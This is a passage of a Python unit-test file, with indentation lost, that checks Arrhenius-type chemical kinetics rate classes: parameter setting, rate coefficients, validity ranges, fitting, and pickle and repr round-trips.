self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
self.assertEqual(self.arrhenius.comment, arrhenius.comment)
def test_change_rate(self):
"""
Test the Arrhenius.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tlist])
self.arrhenius.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.arrhenius.get_rate_coefficient(T)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
def test_to_cantera_kinetics(self):
"""
Test that the Arrhenius cantera object can be set properly within
a cantera ElementaryReaction object
"""
ctArrhenius = self.arrhenius.to_cantera_kinetics()
self.assertAlmostEqual(ctArrhenius.pre_exponential_factor, 1e9, 6)
self.assertAlmostEqual(ctArrhenius.temperature_exponent, 0.5)
self.assertAlmostEqual(ctArrhenius.activation_energy, 41.84e6)
def test_to_arrhenius_ep(self):
"""
Tests that the Arrhenius object can be converted to ArrheniusEP
"""
arr_rate = self.arrhenius.get_rate_coefficient(500)
arr_ep = self.arrhenius.to_arrhenius_ep()
arr_ep_rate = arr_ep.get_rate_coefficient(500, 10) # the second number should not matter
self.assertAlmostEqual(arr_rate, arr_ep_rate)
def test_to_arrhenius_ep_with_alpha_and_hrxn(self):
"""
Tests that the Arrhenius object can be converted to ArrheniusEP given parameters
"""
hrxn = 5
arr_rate = self.arrhenius.get_rate_coefficient(500)
arr_ep = self.arrhenius.to_arrhenius_ep(alpha=1, dHrxn=hrxn)
self.assertAlmostEqual(1., arr_ep.alpha.value_si)
arr_ep_rate = arr_ep.get_rate_coefficient(500, hrxn)
self.assertAlmostEqual(arr_rate, arr_ep_rate)
def test_to_arrhenius_ep_throws_error_with_just_alpha(self):
with self.assertRaises(Exception):
self.arrhenius.to_arrhenius_ep(alpha=1)
################################################################################
class TestArrheniusEP(unittest.TestCase):
"""
Contains unit tests of the :class:`ArrheniusEP` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.A = 1.0e12
self.n = 0.5
self.alpha = 0.5
self.E0 = 41.84
self.Tmin = 300.
self.Tmax = 3000.
self.comment = 'C2H6'
self.arrhenius = ArrheniusEP(
A=(self.A, "cm^3/(mol*s)"),
n=self.n,
alpha=self.alpha,
E0=(self.E0, "kJ/mol"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
)
def test_a_factor(self):
"""
Test that the ArrheniusEP A property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.A.value_si * 1e6, self.A, delta=1e0)
def test_n(self):
"""
Test that the ArrheniusEP n property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.n.value_si, self.n, 6)
def test_alpha(self):
"""
Test that the ArrheniusEP alpha property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.alpha.value_si, self.alpha, 6)
def test_e0(self):
"""
Test that the ArrheniusEP E0 property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.E0.value_si * 0.001, self.E0, 6)
def test_temperature_min(self):
"""
Test that the ArrheniusEP Tmin property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.Tmin.value_si, self.Tmin, 6)
def test_temperature_max(self):
"""
Test that the ArrheniusEP Tmax property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.Tmax.value_si, self.Tmax, 6)
def test_comment(self):
"""
Test that the ArrheniusEP comment property was properly set.
"""
self.assertEqual(self.arrhenius.comment, self.comment)
def test_is_temperature_valid(self):
"""
Test the ArrheniusEP.is_temperature_valid() method.
"""
Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
validdata = np.array([False, True, True, True, True, True, True, True, True, True], np.bool)
for T, valid in zip(Tdata, validdata):
valid0 = self.arrhenius.is_temperature_valid(T)
self.assertEqual(valid0, valid)
def test_get_rate_coefficient(self):
"""
Test the ArrheniusEP.get_rate_coefficient() method.
"""
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
kexplist = np.array(
[1.6721e-4, 6.8770e1, 5.5803e3, 5.2448e4, 2.0632e5, 5.2285e5, 1.0281e6, 1.7225e6, 2.5912e6, 3.6123e6])
for T, kexp in zip(Tlist, kexplist):
kact = self.arrhenius.get_rate_coefficient(T, )
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
def test_pickle(self):
"""
Test that an ArrheniusEP object can be pickled and unpickled with no loss
of information.
"""
import pickle
arrhenius = pickle.loads(pickle.dumps(self.arrhenius, -1))
self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
self.assertAlmostEqual(self.arrhenius.alpha.value, arrhenius.alpha.value, 4)
self.assertAlmostEqual(self.arrhenius.E0.value, arrhenius.E0.value, 4)
self.assertEqual(self.arrhenius.E0.units, arrhenius.E0.units)
self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
self.assertEqual(self.arrhenius.comment, arrhenius.comment)
def test_repr(self):
"""
Test that an ArrheniusEP object can be reconstructed from its repr()
output with no loss of information.
"""
namespace = {}
exec('arrhenius = {0!r}'.format(self.arrhenius), globals(), namespace)
self.assertIn('arrhenius', namespace)
arrhenius = namespace['arrhenius']
self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
self.assertAlmostEqual(self.arrhenius.alpha.value, arrhenius.alpha.value, 4)
self.assertAlmostEqual(self.arrhenius.E0.value, arrhenius.E0.value, 4)
self.assertEqual(self.arrhenius.E0.units, arrhenius.E0.units)
self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
self.assertEqual(self.arrhenius.comment, arrhenius.comment)
def test_change_rate(self):
"""
Test the ArrheniusEP.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tlist])
self.arrhenius.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.arrhenius.get_rate_coefficient(T)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
################################################################################
class TestPDepArrhenius(unittest.TestCase):
"""
Contains unit tests of the :class:`PDepArrhenius` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.arrhenius0 = Arrhenius(
A=(1.0e6, "s^-1"),
n=1.0,
Ea=(10.0, "kJ/mol"),
T0=(300.0, "K"),
Tmin=(300.0, "K"),
Tmax=(2000.0, "K"),
comment="""This data is completely made up""",
)
self.arrhenius1 = Arrhenius(
A=(1.0e12, "s^-1"),
n=1.0,
Ea=(20.0, "kJ/mol"),
T0=(300.0, "K"),
Tmin=(300.0, "K"),
Tmax=(2000.0, "K"),
comment="""This data is completely made up""",
)
self.pressures = np.array([0.1, 10.0])
self.arrhenius = [self.arrhenius0, self.arrhenius1]
self.Tmin = 300.0
self.Tmax = 2000.0
self.Pmin = 0.1
self.Pmax = 10.0
self.comment = """This data is completely made up"""
self.kinetics = PDepArrhenius(
pressures=(self.pressures, "bar"),
arrhenius=self.arrhenius,
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
)
def test_pressures(self):
"""
Test that the PDepArrhenius pressures property was properly set.
"""
self.assertEqual(len(self.kinetics.pressures.value_si), 2)
for i in range(2):
self.assertAlmostEqual(self.kinetics.pressures.value_si[i] * 1e-5, self.pressures[i], 4)
def test_arrhenius(self):
"""
Test that the PDepArrhenius arrhenius property was properly set.
"""
self.assertEqual(len(self.kinetics.arrhenius), 2)
for i in range(2):
self.assertAlmostEqual(self.kinetics.arrhenius[i].A.value, self.arrhenius[i].A.value, delta=1e0)
self.assertEqual(self.kinetics.arrhenius[i].A.units, self.arrhenius[i].A.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].n.value, self.arrhenius[i].n.value, 4)
self.assertAlmostEqual(self.kinetics.arrhenius[i].Ea.value, self.arrhenius[i].Ea.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].Ea.units, self.arrhenius[i].Ea.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].T0.value, self.arrhenius[i].T0.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].T0.units, self.arrhenius[i].T0.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].Tmin.value, self.arrhenius[i].Tmin.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].Tmin.units, self.arrhenius[i].Tmin.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].Tmax.value, self.arrhenius[i].Tmax.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].Tmax.units, self.arrhenius[i].Tmax.units)
self.assertEqual(self.kinetics.arrhenius[i].comment, self.arrhenius[i].comment)
def test_temperature_min(self):
"""
Test that the PDepArrhenius Tmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmin.value_si, self.Tmin, 6)
def test_temperature_max(self):
"""
Test that the PDepArrhenius Tmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmax.value_si, self.Tmax, 6)
def test_pressure_min(self):
"""
Test that the PDepArrhenius Pmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Pmin.value_si * 1e-5, self.Pmin, 6)
def test_pressure_max(self):
"""
Test that the PDepArrhenius Pmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Pmax.value_si * 1e-5, self.Pmax, 6)
def test_comment(self):
"""
Test that the PDepArrhenius comment property was properly set.
"""
self.assertEqual(self.kinetics.comment, self.comment)
def test_is_pressure_dependent(self):
"""
Test the PDepArrhenius.is_pressure_dependent() method.
"""
self.assertTrue(self.kinetics.is_pressure_dependent())
def test_get_rate_coefficient(self):
"""
Test the PDepArrhenius.get_rate_coefficient() method.
"""
P = 1e4
for T in [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500]:
k0 = self.kinetics.get_rate_coefficient(T, P)
k1 = self.arrhenius0.get_rate_coefficient(T)
self.assertAlmostEqual(k0, k1, delta=1e-6 * k1)
P = 1e6
for T in [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500]:
k0 = self.kinetics.get_rate_coefficient(T, P)
k1 = self.arrhenius1.get_rate_coefficient(T)
self.assertAlmostEqual(k0, k1, delta=1e-6 * k1)
P = 1e5
for T in [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500]:
k0 = self.kinetics.get_rate_coefficient(T, P)
k1 = math.sqrt(self.arrhenius0.get_rate_coefficient(T) * self.arrhenius1.get_rate_coefficient(T))
self.assertAlmostEqual(k0, k1, delta=1e-6 * k1)
def test_fit_to_data(self):
"""
Test the PDepArrhenius.fit_to_data() method.
"""
Tdata = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500], np.float)
Pdata = np.array([1e4, 3e4, 1e5, 3e5, 1e6], np.float)
kdata = np.zeros([len(Tdata), len(Pdata)], np.float)
for t in range(len(Tdata)):
for p in range(len(Pdata)):
kdata[t, p] = self.kinetics.get_rate_coefficient(Tdata[t], Pdata[p])
kinetics = PDepArrhenius().fit_to_data(Tdata, Pdata, kdata, kunits="s^-1")
for t in range(len(Tdata)):
for p in range(len(Pdata)):
self.assertAlmostEqual(kinetics.get_rate_coefficient(Tdata[t], Pdata[p]), kdata[t, p],
delta=1e-6 * kdata[t, p])
def test_pickle(self):
"""
Test that a PDepArrhenius object can be successfully pickled and
unpickled with no loss of information.
"""
import pickle
kinetics = pickle.loads(pickle.dumps(self.kinetics, -1))
Narrh = 2
self.assertEqual(len(self.kinetics.pressures.value), Narrh)
self.assertEqual(len(kinetics.pressures.value), Narrh)
self.assertEqual(len(self.kinetics.arrhenius), Narrh)
self.assertEqual(len(kinetics.arrhenius), Narrh)
for i in range(Narrh):
self.assertAlmostEqual(self.kinetics.pressures.value[i], kinetics.pressures.value[i], 4)
self.assertAlmostEqual(self.kinetics.arrhenius[i].A.value, kinetics.arrhenius[i].A.value, delta=1e0)
self.assertEqual(self.kinetics.arrhenius[i].A.units, kinetics.arrhenius[i].A.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].n.value, kinetics.arrhenius[i].n.value)
self.assertAlmostEqual(self.kinetics.arrhenius[i].T0.value, kinetics.arrhenius[i].T0.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].T0.units, kinetics.arrhenius[i].T0.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].Ea.value, kinetics.arrhenius[i].Ea.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].Ea.units, kinetics.arrhenius[i].Ea.units)
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertAlmostEqual(self.kinetics.Pmin.value, kinetics.Pmin.value, 4)
self.assertEqual(self.kinetics.Pmin.units, kinetics.Pmin.units)
self.assertAlmostEqual(self.kinetics.Pmax.value, kinetics.Pmax.value, 4)
self.assertEqual(self.kinetics.Pmax.units, kinetics.Pmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_repr(self):
"""
Test that a PDepArrhenius object can be successfully reconstructed
from its repr() output with no loss of information.
"""
namespace = {}
exec('kinetics = {0!r}'.format(self.kinetics), globals(), namespace)
self.assertIn('kinetics', namespace)
kinetics = namespace['kinetics']
Narrh = 2
self.assertEqual(len(self.kinetics.pressures.value), Narrh)
self.assertEqual(len(kinetics.pressures.value), Narrh)
self.assertEqual(len(self.kinetics.arrhenius), Narrh)
self.assertEqual(len(kinetics.arrhenius), Narrh)
for i in range(Narrh):
self.assertAlmostEqual(self.kinetics.pressures.value[i], kinetics.pressures.value[i], 4)
self.assertAlmostEqual(self.kinetics.arrhenius[i].A.value, kinetics.arrhenius[i].A.value, delta=1e0)
self.assertEqual(self.kinetics.arrhenius[i].A.units, kinetics.arrhenius[i].A.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].n.value, kinetics.arrhenius[i].n.value)
self.assertAlmostEqual(self.kinetics.arrhenius[i].T0.value, kinetics.arrhenius[i].T0.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].T0.units, kinetics.arrhenius[i].T0.units)
self.assertAlmostEqual(self.kinetics.arrhenius[i].Ea.value, kinetics.arrhenius[i].Ea.value, 4)
self.assertEqual(self.kinetics.arrhenius[i].Ea.units, kinetics.arrhenius[i].Ea.units)
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertAlmostEqual(self.kinetics.Pmin.value, kinetics.Pmin.value, 4)
self.assertEqual(self.kinetics.Pmin.units, kinetics.Pmin.units)
self.assertAlmostEqual(self.kinetics.Pmax.value, kinetics.Pmax.value, 4)
self.assertEqual(self.kinetics.Pmax.units, kinetics.Pmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_change_rate(self):
"""
Test the PDepArrhenius.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.kinetics.get_rate_coefficient(T, 1e5) for T in Tlist])
self.kinetics.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.kinetics.get_rate_coefficient(T, 1e5)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
################################################################################
class TestMultiArrhenius(unittest.TestCase):
"""
Contains unit tests of the :class:`MultiArrhenius` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.Tmin = 350.
self.Tmax = 1500.
self.comment = 'Comment'
self.arrhenius = [
Arrhenius(
A=(9.3e-14, "cm^3/(molecule*s)"),
n=0.0,
Ea=(4740 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
Arrhenius(
A=(1.4e-9, "cm^3/(molecule*s)"),
n=0.0,
Ea=(11200 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
]
self.kinetics = MultiArrhenius(
arrhenius=self.arrhenius,
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
)
self.single_kinetics = MultiArrhenius(
arrhenius=self.arrhenius[:1],
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
)
def test_arrhenius(self):
"""
Test that the MultiArrhenius A property was properly set.
"""
self.assertEqual(self.kinetics.arrhenius, self.arrhenius)
def test_temperature_min(self):
"""
Test that the MultiArrhenius Tmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmin.value_si, self.Tmin, 6)
def test_temperature_max(self):
"""
Test that the MultiArrhenius Tmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmax.value_si, self.Tmax, 6)
def test_comment(self):
"""
Test that the MultiArrhenius comment property was properly set.
"""
self.assertEqual(self.kinetics.comment, self.comment)
def test_is_temperature_valid(self):
"""
Test the MultiArrhenius.is_temperature_valid() method.
"""
Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
validdata = np.array([False, True, True, True, True, True, True, False, False, False], np.bool)
for T, valid in zip(Tdata, validdata):
valid0 = self.kinetics.is_temperature_valid(T)
self.assertEqual(valid0, valid)
def test_get_rate_coefficient(self):
"""
Test the MultiArrhenius.get_rate_coefficient() method.
"""
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
kexplist = np.array(
[2.85400e-06, 4.00384e-01, 2.73563e+01, 8.50699e+02, 1.20181e+04, 7.56312e+04, 2.84724e+05, 7.71702e+05,
1.67743e+06, 3.12290e+06])
for T, kexp in zip(Tlist, kexplist):
kact = self.kinetics.get_rate_coefficient(T)
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
def test_pickle(self):
"""
Test that a MultiArrhenius object can be pickled and unpickled with no loss
of information.
"""
import pickle
kinetics = pickle.loads(pickle.dumps(self.kinetics, -1))
self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
for arrh0, arrh in zip(self.kinetics.arrhenius, kinetics.arrhenius):
self.assertAlmostEqual(arrh0.A.value, arrh.A.value, delta=1e-18)
self.assertEqual(arrh0.A.units, arrh.A.units)
self.assertAlmostEqual(arrh0.n.value, arrh.n.value, 4)
self.assertAlmostEqual(arrh0.Ea.value, arrh.Ea.value, 4)
self.assertEqual(arrh0.Ea.units, arrh.Ea.units)
self.assertAlmostEqual(arrh0.T0.value, arrh.T0.value, 4)
self.assertEqual(arrh0.T0.units, arrh.T0.units)
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_repr(self):
"""
Test that a MultiArrhenius object can be reconstructed from its repr()
output with no loss of information.
"""
namespace = {}
exec('kinetics = {0!r}'.format(self.kinetics), globals(), namespace)
self.assertIn('kinetics', namespace)
kinetics = namespace['kinetics']
self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
for arrh0, arrh in zip(self.kinetics.arrhenius, kinetics.arrhenius):
self.assertAlmostEqual(arrh0.A.value, arrh.A.value, delta=1e-18)
self.assertEqual(arrh0.A.units, arrh.A.units)
self.assertAlmostEqual(arrh0.n.value, arrh.n.value, 4)
self.assertAlmostEqual(arrh0.Ea.value, arrh.Ea.value, 4)
self.assertEqual(arrh0.Ea.units, arrh.Ea.units)
self.assertAlmostEqual(arrh0.T0.value, arrh.T0.value, 4)
self.assertEqual(arrh0.T0.units, arrh.T0.units)
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_to_arrhenius(self):
"""
Test that we can convert to an Arrhenius
"""
answer = self.single_kinetics.arrhenius[0]
fitted = self.single_kinetics.to_arrhenius()
self.assertAlmostEqual(fitted.A.value_si, answer.A.value_si, delta=1e0)
self.assertAlmostEqual(fitted.n.value_si, answer.n.value_si, 1, 4)
self.assertAlmostEqual(fitted.Ea.value_si, answer.Ea.value_si, 2)
self.assertAlmostEqual(fitted.T0.value_si, answer.T0.value_si, 4)
def test_to_arrhenius_temperature_range(self):
"""
Test the to_arrhenius temperature range is set correctly.
"""
answer = self.single_kinetics.arrhenius[0]
fitted = self.single_kinetics.to_arrhenius(Tmin=800, Tmax=1200)
self.assertAlmostEqual(fitted.Tmin.value_si, 800.0)
self.assertAlmostEqual(fitted.Tmax.value_si, 1200.0)
for T in [800, 1000, 1200]:
self.assertAlmostEqual(fitted.get_rate_coefficient(T) / answer.get_rate_coefficient(T), 1.0)
def test_to_arrhenius_multiple(self):
"""
Test the to_arrhenius fitting multiple kinetics over a small range, see if we're within 5% at a few points
"""
answer = self.kinetics
fitted = self.kinetics.to_arrhenius(Tmin=800, Tmax=1200)
self.assertAlmostEqual(fitted.Tmin.value_si, 800.0)
self.assertAlmostEqual(fitted.Tmax.value_si, 1200.0)
for T in [800, 1000, 1200]:
self.assertAlmostEqual(fitted.get_rate_coefficient(T) / answer.get_rate_coefficient(T), 1.0, delta=0.05)
def test_change_rate(self):
"""
Test the MultiArrhenius.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.kinetics.get_rate_coefficient(T) for T in Tlist])
self.kinetics.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.kinetics.get_rate_coefficient(T)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
################################################################################
class TestMultiPDepArrhenius(unittest.TestCase):
"""
Contains unit tests of the :class:`MultiPDepArrhenius` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.Tmin = 350.
self.Tmax = 1500.
self.Pmin = 1e-1
self.Pmax = 1e1
self.pressures = np.array([1e-1, 1e1])
self.comment = 'CH3 + C2H6 <=> CH4 + C2H5 (Baulch 2005)'
self.arrhenius = [
PDepArrhenius(
pressures=(self.pressures, "bar"),
arrhenius=[
Arrhenius(
A=(9.3e-16, "cm^3/(molecule*s)"),
n=0.0,
Ea=(4740 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
Arrhenius(
A=(9.3e-14, "cm^3/(molecule*s)"),
n=0.0,
Ea=(4740 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
],
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
),
PDepArrhenius(
pressures=(self.pressures, "bar"),
arrhenius=[
Arrhenius(
A=(1.4e-11, "cm^3/(molecule*s)"),
n=0.0,
Ea=(11200 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
Arrhenius(
A=(1.4e-9, "cm^3/(molecule*s)"),
n=0.0,
Ea=(11200 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
],
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
),
]
self.kinetics = MultiPDepArrhenius(
arrhenius=self.arrhenius,
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
)
def test_arrhenius(self):
"""
Test that the MultiPDepArrhenius arrhenius property was properly set.
"""
self.assertEqual(self.kinetics.arrhenius, self.arrhenius)
def test_temperature_min(self):
"""
Test that the MultiPDepArrhenius Tmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmin.value_si, self.Tmin, 6)
def test_temperature_max(self):
"""
Test that the MultiPDepArrhenius Tmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmax.value_si, self.Tmax, 6)
def test_pressure_min(self):
"""
Test that the MultiPDepArrhenius Pmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Pmin.value_si * 1e-5, self.Pmin, 6)
def test_pressure_max(self):
"""
Test that the MultiPDepArrhenius Pmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Pmax.value_si * 1e-5, self.Pmax, 6)
def test_comment(self):
"""
Test that the MultiPDepArrhenius comment property was properly set.
"""
self.assertEqual(self.kinetics.comment, self.comment)
def test_is_temperature_valid(self):
"""
Test the MultiPDepArrhenius.is_temperature_valid() method.
"""
Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
validdata = np.array([False, True, True, True, True, True, True, False, False, False], np.bool)
for T, valid in zip(Tdata, validdata):
valid0 = self.kinetics.is_temperature_valid(T)
self.assertEqual(valid0, valid)
def test_is_pressure_valid(self):
"""
Test the MultiPDepArrhenius.is_pressure_valid() method.
"""
Pdata = np.array([1e3, 1e4, 1e5, 1e6, 1e7])
validdata = np.array([False, True, True, True, False], np.bool)
for P, valid in zip(Pdata, validdata):
valid0 = self.kinetics.is_pressure_valid(P)
self.assertEqual(valid0, valid)
def test_get_rate_coefficient(self):
"""
Test the MultiPDepArrhenius.get_rate_coefficient() method.
"""
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
Plist = np.array([1e4, 1e5, 1e6])
kexplist = np.array([
[2.85400e-08, 4.00384e-03, 2.73563e-01, 8.50699e+00, 1.20181e+02, 7.56312e+02, 2.84724e+03, 7.71702e+03,
1.67743e+04, 3.12290e+04],
[2.85400e-07, 4.00384e-02, 2.73563e+00, 8.50699e+01, 1.20181e+03, 7.56312e+03, 2.84724e+04, 7.71702e+04,
1.67743e+05, 3.12290e+05],
[2.85400e-06, 4.00384e-01, 2.73563e+01, 8.50699e+02, 1.20181e+04, 7.56312e+04, 2.84724e+05, 7.71702e+05,
1.67743e+06, 3.12290e+06],
]).T
for i in range(Tlist.shape[0]):
for j in range(Plist.shape[0]):
kexp = kexplist[i, j]
kact = self.kinetics.get_rate_coefficient(Tlist[i], Plist[j])
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
def test_get_rate_coefficient_diff_plist(self):
"""
Test the MultiPDepArrhenius.get_rate_coefficient() when plists are different.
"""
# modify the MultiPDepArrhenius object with an additional entry
pressures = np.array([1e-1, 1e-1, 1e1])
self.kinetics.arrhenius[0].pressures = (pressures, "bar")
self.kinetics.arrhenius[0].arrhenius.insert(0, self.kinetics.arrhenius[0].arrhenius[0])
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
Plist = np.array([1e4, 1e5, 1e6])
kexplist = np.array([
[2.85400e-08, 4.00384e-03, 2.73563e-01, 8.50699e+00, 1.20181e+02, 7.56312e+02, 2.84724e+03, 7.71702e+03,
1.67743e+04, 3.12290e+04],
[2.85400e-07, 4.00384e-02, 2.73563e+00, 8.50699e+01, 1.20181e+03, 7.56312e+03, 2.84724e+04, 7.71702e+04,
1.67743e+05, 3.12290e+05],
[2.85400e-06, 4.00384e-01, 2.73563e+01, 8.50699e+02, 1.20181e+04, 7.56312e+04, 2.84724e+05, 7.71702e+05,
1.67743e+06, 3.12290e+06],
]).T
for i in range(Tlist.shape[0]):
for j in range(Plist.shape[0]):
kexp = kexplist[i, j]
kact = self.kinetics.get_rate_coefficient(Tlist[i], Plist[j])
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
def test_pickle(self):
"""
Test that a MultiPDepArrhenius object can be pickled and unpickled with
no loss of information.
"""
import pickle
kinetics = pickle.loads(pickle.dumps(self.kinetics, -1))
